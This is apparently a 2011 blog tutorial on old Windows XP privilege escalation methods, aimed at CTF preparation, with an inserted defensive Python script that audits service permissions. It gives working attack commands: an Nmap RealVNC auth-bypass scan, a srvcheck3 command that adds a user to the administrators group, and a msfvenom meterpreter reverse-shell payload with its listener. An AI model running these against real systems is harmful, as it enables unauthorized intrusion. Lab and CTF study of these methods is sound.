Wednesday, November 16, 2011

Old Privilege Escalation Techniques

One of my pet-peeves when it comes to "ethical hacker" training is that it is normally outdated and irrelevant. Teaching students how to use hacking "tools" from 2001 creates misinformed professionals and increases the number of low-skilled, highly-certified people in our industry. Truthfully, it’s been years since I last saw an unpatched Windows XP machine without AV on an engagement. I am aware of exceptions such as stand-alone workstations and SCADA systems, but generally machines shouldn't receive a pentest if they aren’t at least patched.

With that said, this post contains nothing new, fresh or possibly even relevant. I was prompted to write it after a few discussions with people who are preparing for upcoming CTFs. This is just a collection of old privilege escalation methods for unpatched Windows XP through SP2 workstations which may or may not be helpful. Some methods work better than others and many rely on vulnerabilities that have long been patched. If you are looking for new and exciting exploitation techniques, go here.

An older vulnerability that I do continue to see quite regularly is in the RealVNC product. RealVNC is a remote administration tool and typically listens on 5900. To scan for VNC and check for the RealVNC authentication bypass vulnerability with Nmap:

nmap -Pn -p5900 x.x.x.x --script=realvnc-auth-bypass

It may be important to note that RealVNC also hosts a Java-based web server on port 5800. This target machine is most likely vulnerable according to Nmap. There are several "patched" versions of the VNC client which allow you to take advantage of the vulnerability. You can download one here or read more about the vulnerability here.

Disclaimer: Links provided on this site are for research purposes only. Always exercise caution when downloading code from the internet, especially hack tools.

Once you've downloaded and vetted the exploit, you can run it in Linux with wine.

Enter the IP address of the target and you will likely be presented with a view of the currently logged-in user's desktop. The only thing the active user will see is the RealVNC icon in the bottom right corner turn black. They will also be able to quickly get the IP address that is connected. If you encounter this vulnerability on a real engagement, you should probably have a plan to quickly convert this access to a more stealthy method.

Another note is that several commercial security products such as Symantec Endpoint Protection detect and block this attack.

Now that we have GUI access to the machine, let's find out more about the account and privileges we currently have. Windows XP lacks the "whoami" binary, but with GUI access we can see the user by clicking the "start" button. The following "net" command lets us know that we are just a limited user:

net user joe.user

We can see what service packs are installed by checking the system properties.

There are several methods for introducing code to the machine, but the easiest method in this scenario is with IE or any other browser. Let’s grab a few exploits from:

Vet the code. Then throw them in a zip to be introduced onto the target machine.

Once we have uploaded our zip file with the binaries we can get started with the demo. The first method can be used from nearly any privilege level in order to reach "NT Authority\System" privileges. Simply upload the compiled KiTrap0d exploit along with the vdmexploit.dll and execute it. It works great for this scenario, but if you are attempting to use it through other attack vectors - you will likely have to make some minor adjustments to the code and recompile it.

This vulnerability was patched by MS10-015, but the exploit continues to be extremely reliable when a machine has not been patched properly.

Another older method of escalation involves insecure permissions on services in Windows XP SP1 and Server 2003 (pre-SP1). Srvcheck3 is a tool which can scan for and exploit these permissions. For example, below is the output of "srvcheck3.exe -l" on a Windows XP SP1 machine.

You can then use srvcheck3 to exploit the service with the following syntax:

srvcheck3.exe -m upnphost -H -c "cmd.exe /c net localgroup administrators joe.user /add"

This method will not work against our XP SP2 demo target, but we successfully added our limited user to the administrators group on the XP SP1 machine.
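A defender-side audit for the weak service permissions that srvcheck3 looks for, added here as an example and not code from the original post: it parses the SDDL that "sc sdshow <service>" prints on Windows and flags allow-ACEs that grant reconfiguration or ACL-write rights to low-privileged principals. The service names and SDDL strings below are constructed for the example, not captured from a real host.

```python
# Audit Windows service DACLs (format of "sc sdshow <svc>") for ACEs that let
# non-administrators change a service's config, DACL or owner.
import re
from typing import Dict, List, Tuple

# SDDL right codes that allow reconfiguring or taking over a service:
# DC=SERVICE_CHANGE_CONFIG, WD=WRITE_DAC, WO=WRITE_OWNER, GA/GW=generic all/write.
DANGEROUS_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
# Same rights as bit masks, for ACEs written with a hex access mask.
HEX_RIGHTS = {0x2: "DC", 0x40000: "WD", 0x80000: "WO", 0x10000000: "GA", 0x40000000: "GW"}
# Well-known SID aliases for non-administrative principals. Note "WD" here means
# Everyone (SID field), whereas "WD" in the rights field means WRITE_DAC.
LOW_PRIV_SIDS = {"AU", "IU", "BU", "WD", "AN", "BG"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl: str) -> List[Tuple[str, str, List[str]]]:
    """Return (ace_type, sid, [right_code, ...]) for every ACE in the D: section."""
    match = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not match:
        return []
    aces = []
    for body in ACE_RE.findall(match.group(1)):
        fields = body.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6:
            continue
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if rights.lower().startswith("0x"):
            mask = int(rights, 16)
            codes = [name for bit, name in HEX_RIGHTS.items() if mask & bit]
        else:
            codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append((ace_type, sid, codes))
    return aces


def weak_services(sdshow: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each service to the low-privileged SIDs allowed a dangerous right."""
    findings: Dict[str, List[str]] = {}
    for svc, sddl in sdshow.items():
        hits = [sid for ace_type, sid, codes in parse_dacl(sddl)
                if ace_type == "A" and sid in LOW_PRIV_SIDS and DANGEROUS_RIGHTS & set(codes)]
        if hits:
            findings[svc] = hits
    return findings


# Constructed sample output: the first DACL is a typical default (users read-only),
# the second lets Authenticated Users (AU) change the service configuration (DC).
SAMPLE_SDSHOW = {
    "dnscache": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)",
    "upnphost": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
}
```

Feeding real "sc sdshow" output for every service into weak_services() gives the list a patch or "sc sdset" hardening pass should target first.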

Another generic privilege escalation method is to find a remote exploit such as MS08-067 or MS03-026, compile it and target it at This method can be extremely effective in lab settings and CTFs. Just be mindful of your target and ensure that the exploit is properly suited for it. For example, some public exploits aren't written to work against NX targets.

You can clearly see the targets that are available for the DCOM exploit in the screenshot below:

The methods discussed above can be used to escalate from user-level privileges to System, but what if you have administrator privileges and you want to get to System? There are a few easy methods on pre-Vista machines, but one example method is to use the "At" scheduler.

The "at" command is deprecated but works just fine against XP/2K3 targets. First we ensure that the scheduler service is running. If not, we would issue the "net start schedule" command. Next, we find out the system time and finally we schedule our task to run interactively a few minutes in the future. This particular syntax works against XP, but your mileage may vary against different service pack levels of Server 2K3.

In this example we had it pop up a system-level cmd.exe interactively, but you will likely find more use out of having it execute some other command or executable.

Of course, if I were presented with this general scenario on a real engagement, I would use the Metasploit framework. Since our unpatched XP target doesn't have PowerShell installed, we will have to generate an executable with Metasploit. Most AV products will flag a meterpreter payload as malicious, but in this case there isn't an AV product installed.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 4 -f exe LHOST=x.x.x.x LPORT=443 > /root/Desktop/demo.exe

Next we can download our exe through IE and execute it. From the user-level process, we can run the "getsystem" post exploitation module.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E

As you can see, "technique 4" was used. Technique 4 is the KiTrap0d attack discussed earlier, implemented in the 'priv' extension of meterpreter. If we had administrative privileges, it would have succeeded with a different technique.

Finally, thank you to all of the researchers who discovered these vulnerabilities and went through the pain of disclosing them properly.